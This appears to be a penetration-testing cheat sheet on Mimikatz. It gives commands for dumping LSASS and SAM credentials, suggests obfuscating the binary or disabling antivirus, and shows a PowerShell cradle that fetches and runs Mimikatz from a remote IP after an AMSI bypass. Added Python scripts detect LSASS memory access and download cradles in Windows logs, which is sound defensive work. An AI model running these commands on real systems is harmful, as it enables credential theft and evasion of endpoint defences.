Mimikatz

Overview

Mimikatz can be used to dump credentials from memory and create Kerberos tickets, although the stock executable is flagged by virtually every anti-virus product out there. Heavily obfuscating the executable or turning off AV is your best bet for using it.

Running Mimikatz

Inside an Administrator shell:

mimikatz.exe
privilege::debug                - enables all other attacks
sekurlsa::logonPasswords        - can show plaintext passwords saved in credman
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

The credman (Credential Manager) passwords appear in clear text because, when a network drive is mapped with the "Connect using different credentials" option, the credential is cached in credman in clear text.
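From the defensive side, the sekurlsa::logonpasswords step above works by reading LSASS process memory, and that handle open is exactly what endpoint telemetry records. The following is an added example, not part of the original notes: a small Python checker that walks Sysmon Event ID 10 (ProcessAccess) records and flags any non-system process that opens lsass.exe with a handle that includes PROCESS_VM_READ. The log lines, the key=value layout and the allow-list of benign source images are constructed assumptions for this example; real Sysmon output is XML and would be flattened first, and the allow-list has to be tuned per environment.

```python
"""Flag process-access events against lsass.exe that carry the memory-read
right credential dumpers such as Mimikatz need (Sysmon Event ID 10).

Example code added to these notes; the events below are CONSTRUCTED."""
import re

# Sysmon Event ID 10 (ProcessAccess) fields flattened to key=value pairs.
# Constructed sample telemetry, not real log data.
SAMPLE_EVENTS = [
    r"EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000",
    r"EventID=10 SourceImage=C:\Users\admin\Desktop\mimikatz.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010",
    r"EventID=10 SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe",
]

# Access-right bits from PROCESS_ACCESS_RIGHTS. Reading another process's
# memory requires PROCESS_VM_READ (0x0010); PROCESS_QUERY_INFORMATION
# (0x0400) is normally requested alongside it, which is why masks such as
# 0x1010 and 0x1410 are the ones seen most often for LSASS dumping.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# System processes that legitimately open LSASS with broad rights on a
# stock host. Assumption for this example: tune for your environment.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened key=value line into a dict."""
    return dict(FIELD_RE.findall(line))


def is_suspicious_lsass_access(event):
    """True when a non-allow-listed process opens lsass.exe with read access."""
    if event.get("EventID") != "10":
        return False
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if event.get("SourceImage", "").lower() in BENIGN_SOURCES:
        return False
    granted = int(event.get("GrantedAccess", "0"), 16)
    # Read access to LSASS memory is the essential capability; an
    # all-access handle (0x1FFFFF) is flagged too because it includes it.
    return bool(granted & PROCESS_VM_READ)


def find_lsass_dumping(lines):
    """Return the SourceImage of every event that matches the dumping pattern."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_suspicious_lsass_access(event):
            hits.append(event["SourceImage"])
    return hits


if __name__ == "__main__":
    for source in find_lsass_dumping(SAMPLE_EVENTS):
        print("suspicious LSASS access from", source)
```

The check keys on the access mask rather than on the process name, so a renamed or obfuscated binary is still flagged as long as it has to read LSASS memory to do its job; the allow-list exists because a few system processes open LSASS with broad rights during normal operation and would otherwise generate constant noise.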

Mimikatz.ps1

Run in memory after an AMSI bypass:

IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')
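The one-liner above is a download cradle: a script block that fetches code over the network and hands it straight to IEX, so the script never touches disk. Script block logging is a separate control from AMSI and still records the text of what ran, so this pattern is visible in the ScriptBlockText of PowerShell Event ID 4104 records. As an added example that is not part of the original page, the Python below applies the match a script-block-logging rule would use: both halves of the cradle (an executor and a Net.WebClient download call) must be present, matched case-insensitively because PowerShell is. The sample script blocks and the URLs in them are constructed.

```python
"""Flag PowerShell script blocks that download code and execute it in memory.

Input is the ScriptBlockText of Microsoft-Windows-PowerShell/Operational
Event ID 4104 records. Example code added to these notes; the script blocks
below are CONSTRUCTED and the URLs point at documentation address space."""
import re

# Constructed sample script-block texts, not captured telemetry.
SAMPLE_SCRIPT_BLOCKS = [
    r"Get-ChildItem C:\Users | Sort-Object LastWriteTime",
    "IEX(New-Object Net.WebClient).downloadString('http://192.0.2.10/mimikatz.ps1')",
    'iex (nEw-oBjEcT nEt.wEbClIeNt).DoWnLoAdStRiNg("http://192.0.2.10/m.ps1")',
    r"Invoke-WebRequest https://example.invalid/update.zip -OutFile C:\Temp\update.zip",
]

# A cradle needs something that executes a string ...
EXECUTE_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
# ... and something that fetches that string over the network.
FETCH_RE = re.compile(r"net\.webclient.*?\.download(string|data)\s*\(", re.IGNORECASE | re.DOTALL)
# URL inside the fetch call, for triage; stops at quotes and parentheses.
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def is_download_cradle(script_text):
    """True when the block both fetches over the network and executes the result."""
    return bool(EXECUTE_RE.search(script_text) and FETCH_RE.search(script_text))


def find_download_cradles(script_blocks):
    """Return the script blocks that match the cradle pattern, in input order."""
    return [block for block in script_blocks if is_download_cradle(block)]


def cradle_urls(script_blocks):
    """Return the URLs pulled by every flagged block, for blocking and hunting."""
    urls = []
    for block in find_download_cradles(script_blocks):
        urls.extend(URL_RE.findall(block))
    return urls


if __name__ == "__main__":
    for block in find_download_cradles(SAMPLE_SCRIPT_BLOCKS):
        print("download cradle:", block)
    print("fetched from:", cradle_urls(SAMPLE_SCRIPT_BLOCKS))
```

Requiring both halves keeps a plain Invoke-WebRequest that saves a file to disk (the fourth sample) out of the results, while the mixed-case third sample is still caught because the regexes ignore case the same way the PowerShell parser does.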
